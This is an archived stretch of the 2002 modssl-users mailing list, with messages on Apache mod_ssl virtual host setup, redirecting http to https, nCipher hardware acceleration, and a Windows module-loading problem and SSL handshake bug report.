RE:>>2. where do i put the virtual host details for https page
SSLVerifyClient none<
This you put in the ssl.conf file.  Since Apache 2.0.35 already is mod_ssl
aware, all you
should need to do is something like:
----
Listen 443


DocumentRoot "/var/www/secure.server.com/"
ServerName secure.server.com:443

---
If you don't require the SSLClient to verify, then you shouldn't have to set
up anything because the web server
software should just handle your secure communications.

There are a few other settings that need to be set to read your certificate
files, but this should get you
to the point of users being able to connect to the https server.   And, you
said that you had all of the files
created so I would imagine that you can see how the default is set.  You
would change those settings to
point to YOUR CRT and KEY files instead.

Again, do you have a specific error message?  What does your access_log say
on that server?

------------
RE:>>3. where do i put the virtual host details for https page
SSLVerifyClient<
---
Make sure the SSLVerifyClient require statement is uncommented in the
ssl.conf file.  I did this and immediately,
my secure server requests a certificate from my client.  I think you can
then pick the client cert you want to use from a list, if the client has
one.  (I don't have one in my client as I have never had a need for one).

The best info I had on this was from a message by Owen Boyle with a subject
line of "Creating Client Certificates".  If you can't find it, I'll forward
a copy to you...

RE:>>now I need to create three virtual hosts
One at 80, one at 443, and one at 8443?  Wouldn't this work?

Good luck.  I'm going to have to bow out because I would be the blind
leading the blind.  Hopefully I haven't steered you too far off track. :-)

Andrew Lietzow
The ACL Group, Inc.



----- Original Message -----
From: "Sonu Kishore" 
To: ; 
Sent: Monday, April 22, 2002 11:44 AM
Subject: Re: important - virtual hosts for apache 2.0


> Thanx Andrew for a quick response.
>
> I am in a mess ... this project landed in my lap just 8 days back when I
new
> nothing about apache's httpd.conf or PKI or openssl etc etc..
> But today i feel so much more aware.
>
> [http page]
> The problem is in our intranet site we have first page which has to be a
http
> page where the new user sends a request for certificate to my CA.
>
> [https Page - SSLVerifyClient none]
> The second page is where the new user is asked to provide user id & PEM
pass
> phrase to generate a certificate
>
> [http page - SSLVerifyClient require]
> The third page where all registered users fill there user id & password
and use
> the intranet aaplication.
>
> now I need to create three virtual hosts in
> [httpd.conf file]
> [ssl.conf file]
> how do configure the two files for the same.
>
> 1. where do i put the virtual host details for http page
> 2. where do i put the virtual host details for https page SSLVerifyClient
none
> 3. where do i put the virtual host details for https page SSLVerifyClient
> require
>
> Please suggest.
>
> Regards
>
> Sonu.
>
>
>
>
> --- Andrew Lietzow  wrote:
> > Dear Sonu,
> > RE:>>I have configured my httpd.conf & ssl.conf file also but probably I
am
> > not
> > doing something right as my site is not opening as required.
> > ...and...
> > RE:>>> I have one page which has to be http
> > > I have the second page which has to be https with sslverifyclient none
> > > I have a third page which is https with sslverifyclient require
> > > I have read that i will require IP base virtual hosts.
> > ...and...
> > RE:>>
> > I want to use apache 2.0 how do I configure it with mod_ssl & openssl.
> > --------
> > Okay, now that you have shared the background, what exactly is
happening?  I
> > guess the reason I was (on Saturday) curious as to whether you have
followed
> > guides available
> > from Apache, openssl, and mod_ssl is because FOR ME, the Apache 2.0.35
> > system
> > configured very quickly to provide a secure server, without hardly a
> > whimper.  Download the tarball,
> > run configure, generate the key, csr, and crt, and voila, secure server
is
> > up and running.  This does
> > not, however, address your last configuration, with sslverifyclient =>
> > require.  That I have not tried.
> >
> > However, if you can provide the scenario for your error or perceived
> > disfunctionality of the system,
> > then possibly someone can help you quickly move forward.  I doubt that
it is
> > I, but send
> > more information and I'll be glad to help if I can.  Most here will do
the
> > same, or so I believe,
> > or they probably wouldn't continue to subscribe.
> >
> > Take some time to thoroughly clearly describe the error or the problem
and
> > you may get some
> > very quick help.
> >
> > Good Luck!
> >
> > Andrew Lietzow
> > The ACL Group, Inc.
> >
>
>
> __________________________________________________
> Do You Yahoo!?
> Yahoo! Games - play chess, backgammon, pool and more
> http://games.yahoo.com/
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Apr 22 22:22:11 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id WAA17434; Mon, 22 Apr 2002 22:21:50 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from atlanta.pop3now.com id WAA17401; Mon, 22 Apr 2002 22:20:53 +0200 (MET DST)
From: rmckeever@earthlink.net
Received: (from nobody@localhost)
	by atlanta.pop3now.com (8.11.2/8.11.2) id g3MKKji14990;
	Mon, 22 Apr 2002 16:20:45 -0400
Date: Mon, 22 Apr 2002 16:20:45 -0400
Message-Id: <200204222020.g3MKKji14990@atlanta.pop3now.com>
To: modssl-users@modssl.org
Subject: Why https vs http
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: rmckeever@earthlink.net
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hello, 

Im looking for anyones thoughts on why it is not a good Idea to have 
an https site be able to convert to an http site. I am having many  
disscusions with co-workers that feel the client would be at fault if 
they type in the http link instead of using the https link that is 
provided??

I feel that the customer should not even have the chance to enter 
http and be able to log in. My response to my team is "It's our job 
(web team) not to even let them have access to the http link, it 
should redirect or give error." What do you people have to add to 
this????? 

Thanks,
Ron


--
Pop3Now Personal, Get quick remote access to your email accounts!
Sign Up Now!  Visit http://www.pop3now.com/personal

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Apr 22 22:31:11 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id WAA17752; Mon, 22 Apr 2002 22:30:35 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from marvin-lnx.int.tele.dk id WAA17690; Mon, 22 Apr 2002 22:29:36 +0200 (MET DST)
Received: by marvin-lnx.int.tele.dk (Postfix, from userid 500)
	id 853A5BD2B; Mon, 22 Apr 2002 22:30:09 +0200 (CEST)
Date: Mon, 22 Apr 2002 22:30:09 +0200
From: Mads Toftum 
To: modssl-users@modssl.org
Subject: Re: Why https vs http
Message-ID: <20020422203009.GB17429@marvin-lnx.int.tele.dk>
Mail-Followup-To: modssl-users@modssl.org
References: <200204222020.g3MKKji14990@atlanta.pop3now.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <200204222020.g3MKKji14990@atlanta.pop3now.com>
X-Mailer: mutt
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mads Toftum 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Mon, Apr 22, 2002 at 04:20:45PM -0400, rmckeever@earthlink.net wrote:
> Hello, 
> 
> Im looking for anyones thoughts on why it is not a good Idea to have 
> an https site be able to convert to an http site. I am having many  
> disscusions with co-workers that feel the client would be at fault if 
> they type in the http link instead of using the https link that is 
> provided??
> 
> I feel that the customer should not even have the chance to enter 
> http and be able to log in. My response to my team is "It's our job 
> (web team) not to even let them have access to the http link, it 
> should redirect or give error." What do you people have to add to 
> this????? 
> 
Something like this in your http vhost:
RedirectMatch permanent ^/(.*)$ https://www.example.com/$1

vh

Mads Toftum
-- 
With a rubber duck, one's never alone.
              -- "The Hitchhiker's Guide to the Galaxy"
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Apr 22 22:42:12 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id WAA18134; Mon, 22 Apr 2002 22:41:36 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from spong.regiocom.net id WAA18091; Mon, 22 Apr 2002 22:40:24 +0200 (MET DST)
Received: from web by spong.regiocom.net with local (Exim 3.13 #1)
	id 16zkbm-0005mT-00
	for modssl-users@modssl.org; Mon, 22 Apr 2002 21:40:22 +0100
Received: from 217.134.219.130 ( [217.134.219.130])
	as user nick@localhost by webmail.regiocom.net with HTTP;
	Mon, 22 Apr 2002 21:40:22 +0100
Message-ID: <1019508022.3cc47536d4812@webmail.regiocom.net>
Date: Mon, 22 Apr 2002 21:40:22 +0100
From: NickM 
To: modssl-users@modssl.org
Subject: Re: Why https vs http
References: <200204222020.g3MKKji14990@atlanta.pop3now.com>
In-Reply-To: <200204222020.g3MKKji14990@atlanta.pop3now.com>
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 8bit
User-Agent: Internet Messaging Program (IMP) 3.1
X-Originating-IP: 217.134.219.130
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: NickM 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

KISS - The user should not be made to think, if the data is secure data then 
the user should be protected.  Most users wont even know much about ssl or even 
the use of https in the url.  In the case where a decision is to be made, for 
example if you are offering email and they can choose to have it secure or not 
then a setting or link to switch between should be supplied.

To say the client would be at fault is basically as ignorant a 
programmer/administrator as can be, again the user should not be the one to 
think, if the design of the site is not transparent then its not fluid and not 
easy.  Im sure a bit of Usability would shut them up, but thats not always an 
option.

As far as not being given the chance - this depends entirely on what the data 
is and what the customer base is.  Will they possibly be using incompatible 
browsers?  Is the data really so sensitive?  Should it be up to the user being 
that its their data (or up to your company if its yours)?  Will the user be 
happy about the loss of performance?  Is the data so sensitive, even though its 
the customers, that they should be protected no matter what (credit cards, 
addresses etc)?

My thoughts, Nick



Quoting rmckeever@earthlink.net:

> Hello, 
> 
> Im looking for anyones thoughts on why it is not a good Idea to have 
> an https site be able to convert to an http site. I am having many  
> disscusions with co-workers that feel the client would be at fault if 
> they type in the http link instead of using the https link that is 
> provided??
> 
> I feel that the customer should not even have the chance to enter 
> http and be able to log in. My response to my team is "It's our job 
> (web team) not to even let them have access to the http link, it 
> should redirect or give error." What do you people have to add to 
> this????? 
> 
> Thanks,
> Ron
> 
> 
> --
> Pop3Now Personal, Get quick remote access to your email accounts!
> Sign Up Now!  Visit http://www.pop3now.com/personal
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Apr 22 23:30:12 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id XAA20155; Mon, 22 Apr 2002 23:29:46 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from serv id XAA20114; Mon, 22 Apr 2002 23:28:26 +0200 (MET DST)
X-ITHouse-Forward-Path: 
Received: From nwadm by serv (IT House Mail Server [IT-B0-D45F090A-345080B0]); Mon, 22 Apr 2002 16:56:17 -0700
Message-ID: <016201c1ea44$8c5793f0$50821b18@nwadm>
From: "Subscribed" 
To: 
References: <200204222020.g3MKKji14990@atlanta.pop3now.com> <1019508022.3cc47536d4812@webmail.regiocom.net>
Subject: Re: Why https vs http
Date: Mon, 22 Apr 2002 16:24:15 -0500
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Subscribed" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I'd have to agree, if they cant type "s" then they shouldnt have access....
HOWEVER: People are sheep. (sorry, but its true) and if you put a redirect
in
youre sure to have less customer service issues and thats mantime you
shouldnt
need to spend.

Just MY thoughts. :)






====================================
"It is said that if you line up all the cars in the
world end to end, someone would be stupid
enough to try and pass them."
====================================
----- Original Message -----
From: "NickM" 
To: 
Sent: Monday, April 22, 2002 3:40 PM
Subject: Re: Why https vs http


> KISS - The user should not be made to think, if the data is secure data
then
> the user should be protected.  Most users wont even know much about ssl or
even
> the use of https in the url.  In the case where a decision is to be made,
for
> example if you are offering email and they can choose to have it secure or
not
> then a setting or link to switch between should be supplied.
>
> To say the client would be at fault is basically as ignorant a
> programmer/administrator as can be, again the user should not be the one
to
> think, if the design of the site is not transparent then its not fluid and
not
> easy.  Im sure a bit of Usability would shut them up, but thats not always
an
> option.
>
> As far as not being given the chance - this depends entirely on what the
data
> is and what the customer base is.  Will they possibly be using
incompatible
> browsers?  Is the data really so sensitive?  Should it be up to the user
being
> that its their data (or up to your company if its yours)?  Will the user
be
> happy about the loss of performance?  Is the data so sensitive, even
though its
> the customers, that they should be protected no matter what (credit cards,
> addresses etc)?
>
> My thoughts, Nick
>
>
>
> Quoting rmckeever@earthlink.net:
>
> > Hello,
> >
> > Im looking for anyones thoughts on why it is not a good Idea to have
> > an https site be able to convert to an http site. I am having many
> > disscusions with co-workers that feel the client would be at fault if
> > they type in the http link instead of using the https link that is
> > provided??
> >
> > I feel that the customer should not even have the chance to enter
> > http and be able to log in. My response to my team is "It's our job
> > (web team) not to even let them have access to the http link, it
> > should redirect or give error." What do you people have to add to
> > this?????
> >
> > Thanks,
> > Ron
> >
> >
> > --
> > Pop3Now Personal, Get quick remote access to your email accounts!
> > Sign Up Now!  Visit http://www.pop3now.com/personal
> >
> > ______________________________________________________________________
> > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> > User Support Mailing List                      modssl-users@modssl.org
> > Automated List Manager                            majordomo@modssl.org
> >
>
>
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Apr 22 23:40:13 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id XAA20519; Mon, 22 Apr 2002 23:39:34 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from gayguide.at id XAA20495; Mon, 22 Apr 2002 23:38:44 +0200 (MET DST)
Received: from pc2 ([192.168.1.15])
	by gayguide.at (8.9.3/8.9.3) with SMTP id XAA20105
	for ; Mon, 22 Apr 2002 23:32:30 +0200
From: =?iso-8859-1?Q?Peter_St=F6hr?= 
To: 
Subject: AW: Why https vs http
Date: Mon, 22 Apr 2002 23:38:41 +0200
Message-ID: 
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 8bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0)
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4807.1700
In-Reply-To: <016201c1ea44$8c5793f0$50821b18@nwadm>
Importance: Normal
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: =?iso-8859-1?Q?Peter_St=F6hr?= 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

you said, what I'm thinking...

on my pages, I still uses the 's' for the secure sites, and the customers
mostly don't notice it. They always come with http and if the want to
transfer something to us (e.g. order), the user will be redirect to the
https, but the sites look like the http, and the customer have not to type
https...

also my thoughts :-)

Peter
Pink Advertising Vienna

-----Ursprüngliche Nachricht-----
Von: owner-modssl-users@modssl.org
[mailto:owner-modssl-users@modssl.org]Im Auftrag von Subscribed
Gesendet: Montag, 22. April 2002 23:24
An: modssl-users@modssl.org
Betreff: Re: Why https vs http


I'd have to agree, if they cant type "s" then they shouldnt have access....
HOWEVER: People are sheep. (sorry, but its true) and if you put a redirect
in
youre sure to have less customer service issues and thats mantime you
shouldnt
need to spend.

Just MY thoughts. :)






====================================
"It is said that if you line up all the cars in the
world end to end, someone would be stupid
enough to try and pass them."
====================================
----- Original Message -----
From: "NickM" 
To: 
Sent: Monday, April 22, 2002 3:40 PM
Subject: Re: Why https vs http


> KISS - The user should not be made to think, if the data is secure data
then
> the user should be protected.  Most users wont even know much about ssl or
even
> the use of https in the url.  In the case where a decision is to be made,
for
> example if you are offering email and they can choose to have it secure or
not
> then a setting or link to switch between should be supplied.
>
> To say the client would be at fault is basically as ignorant a
> programmer/administrator as can be, again the user should not be the one
to
> think, if the design of the site is not transparent then its not fluid and
not
> easy.  Im sure a bit of Usability would shut them up, but thats not always
an
> option.
>
> As far as not being given the chance - this depends entirely on what the
data
> is and what the customer base is.  Will they possibly be using
incompatible
> browsers?  Is the data really so sensitive?  Should it be up to the user
being
> that its their data (or up to your company if its yours)?  Will the user
be
> happy about the loss of performance?  Is the data so sensitive, even
though its
> the customers, that they should be protected no matter what (credit cards,
> addresses etc)?
>
> My thoughts, Nick
>
>
>
> Quoting rmckeever@earthlink.net:
>
> > Hello,
> >
> > Im looking for anyones thoughts on why it is not a good Idea to have
> > an https site be able to convert to an http site. I am having many
> > disscusions with co-workers that feel the client would be at fault if
> > they type in the http link instead of using the https link that is
> > provided??
> >
> > I feel that the customer should not even have the chance to enter
> > http and be able to log in. My response to my team is "It's our job
> > (web team) not to even let them have access to the http link, it
> > should redirect or give error." What do you people have to add to
> > this?????
> >
> > Thanks,
> > Ron
> >
> >
> > --
> > Pop3Now Personal, Get quick remote access to your email accounts!
> > Sign Up Now!  Visit http://www.pop3now.com/personal
> >
> > ______________________________________________________________________
> > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> > User Support Mailing List                      modssl-users@modssl.org
> > Automated List Manager                            majordomo@modssl.org
> >
>
>
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Apr 23 09:32:13 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id JAA22145; Tue, 23 Apr 2002 09:31:10 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from fw1.gdm.de id JAA22123; Tue, 23 Apr 2002 09:30:41 +0200 (MET DST)
From: Alex.Apostolopoulos@secartis.com
Received: (from root@localhost)
	by fw1.gdm.de (8.11.6/8.11.6) id g3N7UPE07254
	for modssl-users@modssl.org; Tue, 23 Apr 2002 09:30:25 +0200 (CEST)
Received: (from localhost) by fw1.gdm.de (MSCAN) id 3/fw1.gdm.de/smtp-gw/mscan; Tue Apr 23 09:30:25 2002
To: modssl-users@modssl.org
Subject: Antwort: Re: encipher box
MIME-Version: 1.0
X-Mailer: Lotus Notes Release 5.07a  May 14, 2001
Message-ID: 
Date: Tue, 23 Apr 2002 09:30:02 +0200
X-MIMETrack: MIME-CD by Notes Server on NOTESGDM3/SRV/GuD(Release 5.0.8 |June 18, 2001) at
 04/23/2002 09:30:04 AM,
	MIME-CD complete at 04/23/2002 09:30:04 AM,
	Serialize by Router on NOTESDMZ1/SRV/GuD(Release 5.0.8 |June 18, 2001) at
 04/23/2002 09:35:00 AM
Content-type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id JAA22141
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Alex.Apostolopoulos@secartis.com
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users




Hi Peter,

thank you for the quick response

cheers alex

Alex Apostolopoulos
_______________________________________________________
WebTechnology & Smart Card Solutions

Secartis AG-eSolutions by Giesecke & Devrient
Bretonischer Ring 3, D-85630 Grasbrunn, Germany

Phone: +49(0)89 4119-7086, Fax: +49(0)89 4119-7403
Email: alex.apostolopoulos@secartis.com, Home: www.secartis.com
_______________________________________________________
|------------------------+------------------------+------------------------|
|                        |   "Peter Viertel"      |                        |
|                        |               |   modssl-users@modssl.o|
|                        |   Gesendet von:        |   rg                   |
|                        |   owner-modssl-users@mo|           Kopie:       |
|                        |   dssl.org             |                        |
|                        |                        |           Thema:       |
|                        |   22.04.2002 19:15     |   Re: encipher box     |
|                        |   Bitte antworten an   |                        |
|                        |   modssl-users         |                        |
|                        |                        |                        |
|------------------------+------------------------+------------------------|






Yes, I've done it a few times with apache 1.3 on Solaris, still mucking
around with apache 2 though.

what you need is:

a) the nCipher software for the o/s - these are binary only and will set
up a daemon called hardserver, and another package that installs the
CHIL library. If they don't have packages for your o/s you are screwed.

b) get/compile openssl-engine not the standard openssl.

c) test openssl: on a sun it goes like this:

# LD_LIBRARY_PATH=/usr/lib:/opt/nfast/toolkits/hwcrhk
# export LD_LIBRARY_PATH
# openssl speed -engine chil

d) now you have openssl talking nCipher ok, you need to recompile
mod_ssl to use openssl-engine... use apache 1.3.24, and configure with
SSL_EXPERIMENTAL option (without this, you cant get it to use nCipher).

e) check you built httpd right:

# LD_LIBRARY_PATH=/usr/lib:/opt/nfast/toolkits/hwcrhk
# export LD_LIBRARY_PATH
# httpd -L | grep SSLCryptoDevice

f) add the following line to httpd.conf:

SSLCryptoDevice chil

Note this shows you how to get any nCipher to provide hardware
acceleration, I think the stuff about getting apache to use keys stored
in an nForce HSM is another topic altogether, and best left off-list
unless enough people want to hear the gory details...

Regards,

PeterV.


Alex.Apostolopoulos@secartis.com wrote:

>Hi,
>
>does anybody have any experience, links or hints how connect mod_ssl and
>enchiper boxes ???
>
>
>As I am new to this list I am not sure if this is right place to ask this
>question.
>
>cheers Alex Apostolopoulos
>_______________________________________________________
>WebTechnology & Smart Card Solutions
>
>Secartis AG-eSolutions by Giesecke & Devrient
>Bretonischer Ring 3, D-85630 Grasbrunn, Germany
>
>Phone: +49(0)89 4119-7086, Fax: +49(0)89 4119-7403
>Email: alex.apostolopoulos@secartis.com, Home: www.secartis.com
>_______________________________________________________
>
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>
>



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Apr 23 13:42:09 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id NAA03003; Tue, 23 Apr 2002 13:41:07 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id NAA02995; Tue, 23 Apr 2002 13:40:58 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id CC1E34CE74B; Tue, 23 Apr 2002 13:40:57 +0200 (CEST)
Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org
	id g3NBcUP37309; Tue, 23 Apr 2002 13:38:30 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from blinky.dmz.inno.com id LAA27080; Tue, 23 Apr 2002 11:22:27 +0200 (MET DST)
From: sks@inno.com
Received: from inno.com (IDENT:apache@test [127.0.0.1])
	by blinky.dmz.inno.com (8.11.2/8.11.2) with SMTP id g3N8xo914295
	for ; Tue, 23 Apr 2002 10:59:50 +0200
Received: from 194.7.32.225 (proxying for unknown)
        (SquirrelMail authenticated user sks)
        by webmail.inno.com with HTTP;
        Tue, 23 Apr 2002 10:59:50 +0200 (CEST)
Message-ID: <12110.194.7.32.225.1019552390.squirrel@webmail.inno.com>
Date: Tue, 23 Apr 2002 10:59:50 +0200 (CEST)
Subject: Problem loading mod_ssl.so in Apache 1.3.24
To: 
X-Priority: 3
Importance: Normal
X-MSMail-Priority: Normal
X-Mailer: SquirrelMail (version 1.2.4 [cvs])
MIME-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: sks@inno.com
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi there,

For some reason Apache refuses to load the mod_ssl module. It always
complains it can't find the module although the required file is in the
specifiedpath. Has anyone encountered this problem? Does anyone know a solution?

I'm running Apache 1.3.24 on Windows NT service pack 5.

Thanks in advance,
Stef

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Apr 23 13:42:13 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id NAA03009; Tue, 23 Apr 2002 13:41:12 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id NAA02996; Tue, 23 Apr 2002 13:40:58 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id DEF5B4CE752; Tue, 23 Apr 2002 13:40:57 +0200 (CEST)
Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org
	id g3NBcIc37303; Tue, 23 Apr 2002 13:38:18 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from localhost id LAA26781; Tue, 23 Apr 2002 11:12:04 +0200 (MET DST)
Date: Tue, 23 Apr 2002 11:12:04 +0200 (MET DST)
Message-Id: <200204230912.LAA26781@opensource.ee.ethz.ch>
From: modssl-bugdb@modssl.org
To: modssl-users@modssl.org
Subject: [BugDB] cannot open pages with ssl (PR#697)
Cc: modssl-bugdb@modssl.org
X-Loop: modssl-bugdb@modssl.org
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: modssl-bugdb@modssl.org
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Full_Name: 
Version: 2-.8.8 1.3.24
OS: w2k server
Submission from: (NULL) (195.23.102.93)


i have a ie 6 and all pages with ssl works fine
but when ie5 with 98se request a page with ssl he read cert we confirm
but give a error page?


i look to ssl log and i detect this:


 Connection: Client IP: 213.58.33.218, Protocol: SSLv3, Cipher: EXP-RC4-MD5
(40/128 bits)
[23/Apr/2002 09:57:43 03028] [info]  Connection to child 40 closed with standard
shutdown (server www.webmail.netexspace.com:443, client 213.58.33.218)
[23/Apr/2002 09:57:47 03028] [info]  Connection to child 43 established (server
www.webmail.netexspace.com:443, client 213.58.33.218)
[23/Apr/2002 09:57:47 03028] [info]  Seeding PRNG with 0 bytes of entropy
[23/Apr/2002 09:57:50 03028] [info]  Spurious SSL handshake interrupt[Hint:
Usually just one of those OpenSSL confusions!?]
[23/Apr/2002 09:57:59 03028] [info]  Connection to child 45 established (server
www.webmail.netexspace.com:443, client 213.58.33.218)
[23/Apr/2002 09:57:59 03028] [info]  Seeding PRNG with 0 bytes of entropy
[23/Apr/2002 09:58:02 03028] [info]  Spurious SSL handshake interrupt[Hint:
Usually just one of those OpenSSL confusions!?]
[23/Apr/2002 09:58:09 03028] [info]  Connection to child 47 established (server
www.webmail.netexspace.com:443, client 213.58.33.218)
[23/Apr/2002 09:58:09 03028] [info]  Seeding PRNG with 0 bytes of entropy
[23/Apr/2002 09:58:11 03028] [info]  Spurious SSL handshake interrupt[Hint:
Usually just one of those OpenSSL confusions!?]
[23/Apr/2002 09:58:25 03028] [info]  Connection to child 49 established (server
www.webmail.netexspace.com:443, client 213.58.33.218)
[23/Apr/2002 09:58:25 03028] [info]  Seeding PRNG with 0 bytes of entropy
[23/Apr/2002 09:58:27 03028] [info]  Spurious SSL handshake interrupt[Hint:
Usually just one of those OpenSSL confusions!?]
[23/Apr/2002 09:59:15 03028] [info]  Connection to child 2 established (server
www.webmail.netexspace.com:443, client 213.58.33.218)
[23/Apr/2002 09:59:15 03028] [info]  Seeding PRNG with 0 bytes of entropy
[23/Apr/2002 09:59:17 03028] [info]  Spurious SSL handshake interrupt[Hint:
Usually just one of those OpenSSL confusions!?]
[23/Apr/2002 09:59:33 03028] [info]  Connection to child 8 established (server
www.webmail.netexspace.com:443, client 213.58.33.218)
[23/Apr/2002 09:59:33 03028] [info]  Seeding PRNG with 0 bytes of entropy
[23/Apr/2002 09:59:36 03028] [info]  Spurious SSL handshake interrupt[Hint:
Usually just one of those OpenSSL confusions!?]

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Apr 23 15:13:04 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id PAA05833; Tue, 23 Apr 2002 15:12:09 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
